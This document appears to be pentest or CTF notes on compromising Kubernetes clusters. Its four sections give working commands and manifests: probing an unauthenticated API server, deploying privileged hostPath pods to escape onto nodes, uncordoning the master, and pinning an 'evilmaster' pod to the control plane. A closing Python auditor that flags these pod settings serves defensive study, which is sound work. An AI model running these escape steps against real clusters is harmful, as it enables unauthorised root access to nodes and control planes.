K8s security

1. API Server unauthenticated access

#Check whether the API server answers without authentication
curl -k https://172.22.14.37:6443/api/v1 | jq '.resources[] | select(.name | in({"pods":1, "secrets":1, "configmaps":1, "nodes":1, "namespaces":1})) | {resource: .name, kind: .kind, verbs: .verbs}'  

#List the images used by existing pods
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -o jsonpath='{.items[*].spec.containers[*].image}'

Create a malicious pod from one of those images to escape to the node (reuse an image that already exists in the cluster)

#everything-allowed-exec-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: nginx:1.8
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
#Create the malicious pod (the manifest above)
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f everything-allowed-exec-pod.yaml
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
#Enter the container; the node root filesystem is under /host
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it everything-allowed-exec-pod -- /bin/bash

2. k8s.yaml (proxy issue)

proxychains hooks too high up the stack and basically cannot proxy programs written in Go, so the proxy has to be written into k8s.yaml instead (the proxy-url field of the cluster entry)

apiVersion: v1
kind: Config
clusters:
  - name: my-cluster
    cluster:
      server: https://10.68.0.1/
      insecure-skip-tls-verify: true
      proxy-url: socks5://127.0.0.1:1080 #your proxy
users:
  - name: my-user
    user:
      token: eyJhbGciOiJSUzxxxx
contexts:
  - name: my-context
    context:
      cluster: my-cluster
      user: my-user
current-context: my-context

3. Master scheduling issue: cordon

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet]
└─# kubectl --kubeconfig k8s.yaml describe node master
Name:               master
Roles:              master
<SNIP>
CreationTimestamp:  Wed, 28 Aug 2024 01:04:22 -0400
Taints:             node.kubernetes.io/unschedulable:NoSchedule
Unschedulable:      true
Lease:
  HolderIdentity:  master
  AcquireTime:     <unset>
  RenewTime:       Fri, 23 Jan 2026 00:19:29 -0500
<SNIP>

The Taints and Unschedulable lines show that the master node is cordoned: the scheduler will not place ordinary pods on it, although static Pods and DaemonSets can still be created there.

Removing the cordon is enough:

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet]
└─# kubectl --kubeconfig k8s.yaml uncordon master
node/master uncordoned

4. Escape container yaml

apiVersion: v1
kind: Pod
metadata:
  name: evilmaster
spec:
  # Target node: node1, node2 or master
  nodeName: master
  tolerations:
    - key: "node.kubernetes.io/unschedulable"
      operator: "Exists"
      effect: "NoSchedule"
  containers:
    - name: mycontainer
      image: 172.22.18.64/public/mysql:5.6
      command: ["/bin/sleep", "3650d"]
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: host
      hostPath:
        path: /
        type: Directory

kubectl --kubeconfig k8s.yaml apply -f master.yaml
kubectl --kubeconfig k8s.yaml get pods
kubectl --kubeconfig k8s.yaml exec -it evilmaster -- /bin/bash
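The two manifests in sections 1 and 4 share a small set of settings that turn a pod into a node-escape vehicle (host namespaces, a privileged container, a hostPath mount of /, and a toleration for the cordon taint plus a hard nodeName to land on the master). The check below is an added example, not part of the original notes: it audits a Pod manifest in dict form (what `kubectl get pod -o json` or a YAML loader returns) and reports each of those settings with a severity, so it can be dropped into an admission webhook or a CI lint for manifests; the sample manifests are constructed here from the ones above.

```python
RISKY_HOST_FLAGS = ("hostNetwork", "hostPID", "hostIPC")


def audit_pod(manifest):
    """Return (severity, message) findings for one Pod manifest (dict form)."""
    spec = manifest.get("spec", {})
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    findings = []
    # Host namespace sharing: each flag exposes node processes/network/IPC.
    for flag in RISKY_HOST_FLAGS:
        if spec.get(flag) is True:
            findings.append(("high", f"{name}: {flag} shares a host namespace"))
    # hostPath volumes; mounting / gives the container the whole node.
    for vol in spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path is not None:
            sev = "critical" if path == "/" else "high"
            findings.append((sev, f"{name}: hostPath volume '{vol.get('name')}' mounts {path}"))
    # Privileged containers bypass most of the container boundary.
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged") is True:
            findings.append(("critical", f"{name}/{c['name']}: privileged container"))
    # Tolerating the cordon taint lets the pod land on an unschedulable node.
    for tol in spec.get("tolerations", []):
        if tol.get("key") == "node.kubernetes.io/unschedulable":
            findings.append(("medium", f"{name}: tolerates the unschedulable (cordon) taint"))
    # A hard nodeName skips the scheduler entirely (and any scheduler policy).
    if spec.get("nodeName"):
        findings.append(("low", f"{name}: pins itself to node {spec['nodeName']}, bypassing the scheduler"))
    return findings


# Constructed sample: the everything-allowed manifest from section 1, as a dict.
EVERYTHING_ALLOWED = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "everything-allowed-exec-pod"},
    "spec": {
        "hostNetwork": True, "hostPID": True, "hostIPC": True,
        "containers": [{"name": "everything-allowed-pod", "image": "nginx:1.8",
                        "securityContext": {"privileged": True},
                        "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}]}],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}

# Constructed sample: an ordinary pod that should yield no findings.
BENIGN = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
          "spec": {"containers": [{"name": "web", "image": "nginx:1.8"}]}}

if __name__ == "__main__":
    for m in (EVERYTHING_ALLOWED, BENIGN):
        for sev, msg in audit_pod(m):
            print(f"[{sev}] {msg}")
```

The same checks map directly onto Pod Security Admission's "baseline" profile (host namespaces, privileged, hostPath) and onto an audit rule on pods whose tolerations or nodeName target the control plane.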